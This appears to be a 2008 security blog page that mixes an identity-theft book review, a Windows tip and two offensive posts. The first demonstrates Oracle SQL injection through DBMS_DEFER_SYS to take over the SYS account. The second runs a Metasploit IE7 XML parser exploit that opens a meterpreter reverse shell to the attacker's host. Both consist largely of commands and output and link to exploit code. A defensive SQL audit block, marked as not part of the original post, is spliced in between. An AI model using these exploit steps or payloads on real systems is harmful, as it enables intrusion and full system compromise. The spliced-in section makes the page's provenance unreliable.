Thursday, December 25, 2008

The Truth About Identity Theft Book Review

by Jim Stickley

4 stars

Witty (Hopefully) Amazon Title: Digestible Truths to Protect Yourself from Identity Theft

When this book showed up (review copy) I initially thought what a piece of garbage. Like a previous commenter said, the book has a lackluster cover and it's small and skinny.
BUT, I flipped through and noticed that it contained lots of little "truths" 3-4 pages in length that quickly covered specific topics related to identity theft and protecting yourself online. So I decided to give it a shot.

The book is broken into 9 parts:

Part 1: The Truth About Phishing and Vishing
Part 2: The Truth About Trash
Part 3: The Truth About No-Tech Identity Theft
Part 4: The Truth About Just How Low Identity Thieves Will Go
Part 5: The Truth About Identity Theft in Plain Sight
Part 6: The Truth About Online Cons
Part 7: The Truth About Security at Work
Part 8: The Truth About Identity Theft from Real Victims
Part 9: The Truth About Putting a Stop to Identity Theft

Again, each part consists of several 3-4 page vignettes on topics related to the section, and each vignette, while short, yields some actionable information on the topic. I didn't have any specific favorites; they were all good. Just about all of them were real world examples that the author conducted during security assessments, or real life examples from people that had contacted the author, or stories he had heard. It's sometimes much easier to empathize with Susan, who was a victim of identity theft, and the troubles she was having trying to set things right. Of real value was the part on Putting a Stop to Identity Theft, which tells you how to get rid of the pre-certified credit card offers, checking your credit reports, actions to take if you are a victim of identity theft and some of the pitfalls that can come up during the process.

So why 4 stars? Well, mostly because I review technical security books, it wouldn't be fair to give a less technical book that doesn't yield "new" (but still useful) information 5 stars when other more technical books are graded much harsher. So that being said, if I had approached it being a less technical reviewer I would have easily given it 5 stars. If you want to get a book for mom and dad to help them protect themselves from themselves and the rest of the bad guys out there, this is the book for them. Unfortunately I finished it too close to Xmas to give copies as gifts.


Monday, December 22, 2008

Oracle Pwnage Part 6 from DBA to SYS

In some of the past posts I covered finding a default user account, or an account with an easy-to-guess username/password, for Oracle and taking that user to DBA via SQL Injection in Oracle packages.

I've been neglecting the blog a bit while porting some of the public SQLI for Oracle into metasploit auxiliary modules. Not sure when it's going to be put into the trunk, but it will be at some point. I think MC is working on the mixin to reduce the dependence on the Oracle instantclient.

Anyway, so it being the week of Christmas or whatever you celebrate I thought I'd put out a module that has a vulnerability out but no exploit code.

So...coverage for:
http://www.appsecinc.com/resources/alerts/oracle/2008-05.shtml

Details:
The PL/SQL package DBMS_DEFER_SYS owned by SYS has an instance of SQL Injection in the DELETE_TRAN procedure. A malicious user can call the vulnerable procedure of this package with specially crafted parameters and execute SQL statements with the elevated privileges of SYS user.

Impact:
Any Oracle database user with EXECUTE privilege on the package SYS.DBMS_DEFER_SYS can exploit this vulnerability. By default, users granted DBA have the required privilege. Exploitation of this vulnerability allows an attacker to execute SQL commands with SYS privileges.

Let's see it in action. Assuming we got DBA from one of the other SQLI modules.

SQL> select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
HACKER DBA NO YES NO

SQL> alter user SYS identified by 0raclefun;
alter user SYS identified by 0raclefun
*
ERROR at line 1:
ORA-01031: insufficient privileges

msf auxiliary(dbms_defer_sys) > set SQL "alter user sys identified by 0raclefun"
SQL => alter user sys identified by 0raclefun
msf auxiliary(dbms_defer_sys) > run

[*] Sending function..
[*] Done...
[*] Calling SYS.DBMS_DEFER_SYS.DELETE_TRAN...
[*] Done...
[*] Auxiliary module execution completed

cg@WPAD:~/oracle$ sqlplus sys/0raclefun@172.16.102.128/oracle as sysdba

SQL*Plus: Release 11.1.0.6.0 - Production on Fri Dec 19 17:43:57 2008

Copyright (c) 1982, 2007, Oracle. All rights reserved.


Connected to:
Oracle Database 10g Enterprise Edition Release 10.1.0.3.0 - Production
With the Partitioning, OLAP and Data Mining options

SQL> select user from dual;

USER
------------------------------
SYS

SQL>

Tested on 9i and 10g release 1

codez available here: http://www.carnal0wnage.com/research/dbms_defer_sys.rb

It's definitely a work in progress, so if you have feedback, send it.
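
For the defensive side of the DBMS_DEFER_SYS issue above, the queries below show which accounts hold the EXECUTE privilege named in the Impact section and turn on auditing of calls to the package. This is an added example, not part of the original post or the Metasploit module; it assumes a DBA session with access to the DBA_* dictionary views and that the AUDIT_TRAIL initialization parameter is enabled.

```sql
-- Added example: audit exposure of SYS.DBMS_DEFER_SYS (run as a DBA).

-- 1. Direct grantees (users or roles) holding EXECUTE on the package.
SELECT grantee, privilege, grantable
FROM   dba_tab_privs
WHERE  owner      = 'SYS'
AND    table_name = 'DBMS_DEFER_SYS'
AND    privilege  = 'EXECUTE'
ORDER  BY grantee;

-- 2. Accounts that inherit the privilege through role nesting. The walk
--    starts at each role found in step 1 and follows dba_role_privs down
--    until it reaches real database users. role_chain shows the path taken.
SELECT DISTINCT rp.grantee AS username,
       SYS_CONNECT_BY_PATH(rp.granted_role, '/') AS role_chain
FROM   dba_role_privs rp
WHERE  rp.grantee IN (SELECT username FROM dba_users)
START  WITH rp.granted_role IN (
         SELECT grantee
         FROM   dba_tab_privs
         WHERE  owner      = 'SYS'
         AND    table_name = 'DBMS_DEFER_SYS'
         AND    privilege  = 'EXECUTE')
CONNECT BY PRIOR rp.grantee = rp.granted_role
ORDER  BY username;

-- 3. Record each call to the package in the standard audit trail.
--    Assumption: AUDIT_TRAIL is set so that object auditing is written.
AUDIT EXECUTE ON sys.dbms_defer_sys BY ACCESS;

-- 4. Review which accounts have called it, and from where.
SELECT username, userhost, timestamp, action_name, returncode
FROM   dba_audit_trail
WHERE  owner    = 'SYS'
AND    obj_name = 'DBMS_DEFER_SYS'
ORDER  BY timestamp;
```

Any account in the output of steps 1 and 2 that does not administer replication is worth questioning, since the post shows that holding DBA is enough to reach the package.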

Missing Add Remove Icon in Windows

Not really security related but notes for me if it comes up again...

Was doing some incident response on a Windows 2003 server and needed to verify a service pack level and installed KBs via the Add/Remove Programs applet, but the icon was missing.

Found the answer on how to call it via the start-->run-->appwiz.cpl

http://en.kioskea.net/faq/sujet-465-the-add-remove-programs-icon-is-missing-in-control-panel


Thursday, December 11, 2008

Internet Explorer 7 XML Parser Buffer Overflow

So this has been an interesting week. Lots of new botnets to dig around in, a bunch of new malware sites making a new effort to obfuscate their code and one 0day [whatever that means].

A few days ago I saw the code for the new IE7 exploit floating around a few malware sites I found. Great timing on the part of the authors to release it right around MS's Patch Tuesday. I looked at it briefly on Tuesday but never got to spend much time figuring it out. It's pretty straightforward though. If you want to know more about how it works then HD Moore has an excellent writeup on it here.

Basically the vuln is in how the SPAN tags format the datasource referenced by the xml to cause a heap corruption. See HD's post for the exact details. Every time I add code to my posts it screws something up. So no code showing this!

Yesterday while looking at the exploit I saw a PoC posted to Milw0rm. Very cool but in my testing it really was not stable [for me at least] and only triggered the vuln about 70% of the time. I think this has to do with how the blocks of memory on the heap are being allocated/deallocated by the JavaScript heapspray code. I could be wrong though.

So I figured I'd port it over to Metasploit as a module and hopefully get it a little more stable. Way more fun to have multiple payloads to choose from. :) I got an initial PoC working but it was not stable and only triggered on XP, as the return pointer for XP was hardcoded into the module. Enter mc. As usual mc was already working on it, so we started going back and forth trying to get this exploit stable and working on multiple targets. mc started by using metasm to generate the return pointers. Very cool! I've never done that before and it's pretty damn cool to use it. He also added target detection based on user-agent string. Awesome! Now we can target specific OS versions with the same exploit.

Even though I tested last night and this morning it seemed to be hit or miss with XP. Arg! Finally I decided to redo the heapspray code to use what I've been working with lately. By dynamically determining the block size to allocate to the heap the exploit seems far more stable. So this morning I redid the heapspray code and got it to fire 100% of the time on XP. Go me! mc tested Vista and got the same results! Hell Yea!

We ran into some issues with obfuscating the code though. Interestingly enough if the variables are randomized and over a certain length the exploit won't trigger. A few other areas of the code gave issues as well when being obfuscated but it seems the exploit is pretty stable as of now.

I guess I should do a video of the module since Chris has started that trend but in the interim...

msf > use exploit/windows/browser/ie_xmlparser
msf exploit(ie_xmlparser) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ie_xmlparser) > set LPORT 2244
LPORT => 2244
msf exploit(ie_xmlparser) > set LHOST 10.10.11.13
LHOST => 10.10.11.13
msf exploit(ie_xmlparser) > set URIPATH ie7.html
URIPATH => ie7.html
msf exploit(ie_xmlparser) > exploit
[*] Exploit running as background job.
[*] Handler binding to LHOST 10.10.11.13
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/ie7.html
[*] Local IP: http://10.10.11.13:8080/ie7.html
[*] Server started.
msf exploit(ie_xmlparser) >

[*] Target is Windows XP
[*] Sending Internet Explorer 7 XML Parser Buffer Overflow to 10.10.10.12:1059...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.

[*] Meterpreter session 1 opened (10.10.11.13:2244 -> 10.10.10.12:1060)
msf exploit(ie_xmlparser) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: VM-XP-SP3
OS : Windows XP (Build 2600, Service Pack 3).
meterpreter >

Working with mc on getting this module to run was educational to say the least. I learned a lot from the debugging and testing. Cheers mc!!

Now all I need is a target... ;)

Cheers,
/dean

**edit
IE7 Zero Day Technical Analysis


Sunday, December 7, 2008

Congrats To My Aura Software Security Friends

Just wanted to give a big congrats to my Aura Software Security friends over in New Zealand for the good things I'm hearing about their hacking netscreen talk.

"Netscreen of the Dead: Developing a Trojaned Firmware for Juniper Netscreen Appliances"

http://www.ruxcon.org.au/files/2008/gn-netscreen-of-the-dead.ppt


http://www.zdnet.com.au/news/security/soa/Ruxcon-security-gurus-hit-Sydney/0,130061744,339293503,00.htm